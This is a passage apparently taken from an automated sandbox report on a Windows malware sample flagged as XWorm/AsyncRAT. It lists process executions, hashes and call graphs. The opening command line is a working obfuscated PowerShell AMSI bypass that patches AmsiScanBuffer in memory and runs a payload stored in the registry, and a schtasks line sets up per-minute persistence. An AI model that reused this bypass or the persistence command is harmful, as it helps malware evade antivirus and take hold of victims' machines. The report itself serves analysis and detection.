Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+
'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BQVbDmmpYciFvEPZCVf=PwejfaSCJJDP @([String])([IntPtr]);$EAvMyVuYpliIybTRzMjsOI=PwejfaSCJJDP 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JZLeUIgnxFO=$mHgtxYLbOzoJe.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$yudsyoexNPPoGc=$mfOCIRUxBUWIVl.Invoke($Null,@([Object]$JZLeUIgnxFO,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'dL'+'i'+''+[Char](98)+''+'r'+''+'a'+'r'+'y'+''+[Char](65)+'')));$WIJhlFbJQceUyrYdX=$mfOCIRUxBUWIVl.Invoke($Null,@([Object]$JZLeUIgnxFO,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+'r'+'o'+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$SWLVYEp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yudsyoexNPPoGc,$BQVbDmmpYciFvEPZCVf).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$xjZyvNWKEgRcmEMjl=$mfOCIRUxBUWIVl.Invoke($Null,@([Object]$SWLVYEp,[Object]('Am'+[Char](115)+''+'i'+''+'S'+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$gRxCzystuh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WIJhlFbJQceUyrYdX,$EAvMyVuYpliIybTRzMjsOI).Invoke($xjZyvNWKEgRcmEMjl,[uint32]8,4,[ref]$gRxCzystuh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xjZyvNWKEgRcmEMjl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WIJhlFbJQceUyrYdX,$EAvMyVuYpliIybTRzMjsOI).Invoke($xjZyvNWKEgRcmEMjl,[uint32]8,0x20,[ref]$gRxCzystuh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('Dead'+'s'+''+[Char](116)+''+[Char](97)+'ger')).EntryPoint.Invoke($Null,$Null)"
Imagebase:0x7ff6e3d50000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:13:37:09
Start date:22/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:13:37:13
Start date:22/10/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
Imagebase:0x7ff76ae30000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:13:37:14
Start date:22/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:13:37:14
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:14
Start time:13:37:14
Start date:22/10/2024
Path:C:\Windows\System32\WerFault.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WerFault.exe -pss -s 492 -p 4188 -ip 4188
Imagebase:0x7ff784be0000
File size:570'736 bytes
MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:15
                                                                                                                                                                                Start time:13:37:15
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 4188 -s 1660
                                                                                                                                                                                Imagebase:0x7ff784be0000
                                                                                                                                                                                File size:570'736 bytes
                                                                                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:16
                                                                                                                                                                                Start time:13:37:15
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\Public\Deadsvchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Users\Public\Deadsvchost.exe
                                                                                                                                                                                Imagebase:0x360000
                                                                                                                                                                                File size:35'840 bytes
                                                                                                                                                                                MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\Deadsvchost.exe, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Deadsvchost.exe, Author: ditekSHen
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 87%, ReversingLabs
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:18
                                                                                                                                                                                Start time:13:37:20
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{ac6bab9f-cf5e-448a-be82-36c64370aff3}
                                                                                                                                                                                Imagebase:0x7ff642ec0000
                                                                                                                                                                                File size:21'312 bytes
                                                                                                                                                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:19
                                                                                                                                                                                Start time:13:37:20
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\winlogon.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:winlogon.exe
                                                                                                                                                                                Imagebase:0x7ff70f350000
                                                                                                                                                                                File size:906'240 bytes
                                                                                                                                                                                MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:20
                                                                                                                                                                                Start time:13:37:21
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\lsass.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\lsass.exe
                                                                                                                                                                                Imagebase:0x7ff7ac940000
                                                                                                                                                                                File size:59'456 bytes
                                                                                                                                                                                MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:21
                                                                                                                                                                                Start time:13:37:22
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:22
                                                                                                                                                                                Start time:13:37:23
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\Public\Deadsvchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Users\Public\Deadsvchost.exe"
                                                                                                                                                                                Imagebase:0xc50000
                                                                                                                                                                                File size:35'840 bytes
                                                                                                                                                                                MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:23
                                                                                                                                                                                Start time:13:37:23
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\dwm.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"dwm.exe"
                                                                                                                                                                                Imagebase:0x7ff68eb30000
                                                                                                                                                                                File size:94'720 bytes
                                                                                                                                                                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:24
                                                                                                                                                                                Start time:13:37:25
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:25
                                                                                                                                                                                Start time:13:37:26
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:26
Start time:13:37:26
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:27
Start time:13:37:26
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:28
Start time:13:37:26
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:13:37:27
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:30
Start time:13:37:29
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:31
Start time:13:37:30
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:13:37:30
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:33
Start time:13:37:31
Start date:22/10/2024
Path:C:\Users\Public\Deadsvchost.exe
Wow64 process (32bit):false
Commandline:"C:\Users\Public\Deadsvchost.exe"
Imagebase:0xe90000
File size:35'840 bytes
MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:13:37:31
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:35
Start time:13:37:32
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:36
Start time:13:37:32
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:37
Start time:13:37:32
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:38
Start time:13:37:33
Start date:22/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:39
                                                                                                                                                                                Start time:13:37:33
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:40
                                                                                                                                                                                Start time:13:37:33
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:41
                                                                                                                                                                                Start time:13:37:34
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:42
                                                                                                                                                                                Start time:13:37:34
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:43
                                                                                                                                                                                Start time:13:37:35
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:wmiadap.exe /F /T /R
                                                                                                                                                                                Imagebase:0x7ff67bdb0000
                                                                                                                                                                                File size:182'272 bytes
                                                                                                                                                                                MD5 hash:1BFFABBD200C850E6346820E92B915DC
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

Execution Graph

Execution Coverage: 79.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 9.1%
Total number of Nodes: 22
Total number of Limit Nodes: 1

Callgraph

Call graph recovered from the report (caller -> callees):
• Function_00401000
• Function_004013C0
• Function_00401364
• Function_00401481 -> Function_0040140B
• Function_0040140B -> Function_004013C0, Function_00401364, Function_0040108C
• Function_0040108C -> Function_00401000

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2153124807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2153089355.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2153143837.0000000000402000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2153820071.0000000000DB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2153820071.0000000000DB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_aoKTzGQSRP.jbxd
Similarity
• API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
• String ID:
• API String ID: 3649950142-0
• Opcode ID: 705c49e648fd9b1a1d69ffeef501898fa4d241a22f223dcb615b77bf033cf5ca
• Instruction ID: af4c8621594d57ca62c0588ebca1cb350ddd3ff269c6439a5bcdebee5f5db335
• Opcode Fuzzy Hash: 705c49e648fd9b1a1d69ffeef501898fa4d241a22f223dcb615b77bf033cf5ca
• Instruction Fuzzy Hash: 4B110CF5E00204ABDB00EBA8DC85F4A73ACAB49308F144476F805E73A1E539E94487A9

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2153124807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2153089355.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2153143837.0000000000402000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2153820071.0000000000DB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2153820071.0000000000DB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_aoKTzGQSRP.jbxd
Similarity
• API ID: memset$ExecuteShell_sleepfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
• String ID: ! @$%s\%s$& @$5 @
• API String ID: 4133905814-3862653719
• Opcode ID: 8caced112e086ed638bbb8cf8541dd6d74207fc2c4a9ce55554e09d949d62a44
• Instruction ID: 4edde01989566f50ee057288f9be0b5ed355bef574f976823b0df2ad489e3bde
• Opcode Fuzzy Hash: 8caced112e086ed638bbb8cf8541dd6d74207fc2c4a9ce55554e09d949d62a44
• Instruction Fuzzy Hash: A37116F1E001049BEB54DB9CDC81B9E77B9DB44309F04417AF609FB391E638AA84CB69

Control-flow Graph

Basic blocks recovered from the report (block: address range, successors):
• Block 22: 401000-40102e, calls malloc -> 23
• Block 23: 401031-401039 -> 24, 25
• Block 24: 401087-40108b (exit)
• Block 25: 40103f-401085 -> 23 (loop back edge)
APIs
Strings
• 60x^x*=$y7sp(p^t=]gxy232ivwpmdiw, xrefs: 0040106E
Memory Dump Source
• Source File: 00000000.00000002.2153124807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2153089355.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2153143837.0000000000402000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2153820071.0000000000DB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2153820071.0000000000DB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_aoKTzGQSRP.jbxd
Similarity
• API ID: malloc
• String ID: 60x^x*=$y7sp(p^t=]gxy232ivwpmdiw
• API String ID: 2803490479-2091870010
• Opcode ID: 91c712a457c5bcb1fe37ff218b7de2090aff4be442d454a9ca53cbc19ecf6a65
• Instruction ID: 98a03abeaff14c364fcb154303c0624157da0fb38b5f95688f54183b5f94f11a
• Opcode Fuzzy Hash: 91c712a457c5bcb1fe37ff218b7de2090aff4be442d454a9ca53cbc19ecf6a65
• Instruction Fuzzy Hash: 1E11CCB0A05648EFCB04CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45

Control-flow Graph
• Function 40140b-40145e: call 401364, call 40108c, call 4013c0
Memory Dump Source
• Source File: 00000000.00000002.2153124807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
